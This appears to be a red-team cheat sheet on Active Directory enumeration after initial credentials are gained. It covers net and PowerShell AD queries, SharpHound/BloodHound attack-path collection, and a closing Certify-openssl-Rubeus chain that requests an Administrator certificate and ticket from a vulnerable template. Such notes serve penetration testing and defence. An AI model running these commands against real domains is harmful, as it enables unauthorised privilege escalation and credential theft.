4.1 KiB
4.1 KiB
Enumerate Active Directory
Enumeration following after initial credentials are gained
SYSVOL
- On windows use
runasand gain local administrative permissions via
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
- Check validity of credentials against
SYSVOL, it stores Group Policy Objects (GPO). Every AD account will gain access- Query DNS, for example the DC
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
dir \\%HOSTNAME%\SYSVOL\
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
Microsoft Management Console (MMC)
- Use AD Snap-ins of
Remote Server Administrative Tools- Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search
RSAT-> SelectRSAT: Active Directory Domain Services and Lightweight Directory Tools-> Install Win+r->MMC-> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right clickActive Directory Sites and Services->Change Forest-> Add root domain -> right clickActive Directory Users and Computers-> Change Domain -> enter root domain -> right clickActive Directory Users and Computers-> View -> Advanced Features- Start enumerating via click on the domain object in the tree on the left
- Take a look at
Peopledirectory -> right click on them to see properties - Change or create user or change groups
- Also use
MMCto enumerate
- Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search
CMD enumeration
Execute from domain joined machine
- Users
net user /domain
- Specific user
net user <username> /domain
- Groups
net group /domain
- Specific group
net group <groupname> /domain
- Password Policy via accounts
net accounts /domain
Powershell Cmdlets
- User details via
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
- Groups
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
- Group membership
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
- Generic AD objects
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
- Domains
Get-ADDomain -Server exampleDC.com
Sharphound and Bloodhound
-
Change to AD user via
runas.exeand collect via one of the following- Sharphound.ps1
- sharphound.exe
- Azurehound.ps1
-
For example
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
- After some time collect the current sessions via
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
- Start neo4j db
neo4j console start
- Start bloodhound
bloodhound --no-sandbox
- Drag and Drop the zip file from Sharphound
- Either search for AD objects and use
Analysisto find an attack path through the info on the edges - Shows exploitable accounts in the
Analysistab, for example kerberroastable accounts
LDAP
PowerView
WMI
Find Certifications and Private Keys
Certification Services can be found with the Certify tool.
- Enumerate vunerabilities on the current user via Certify, use
FullNamefound in the first step to insert domain in the second step
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
- Copy the found key and convert it like mentioned in the last line of the ouptut, for example
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
- Get ticket with the the loot via Rubeus
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials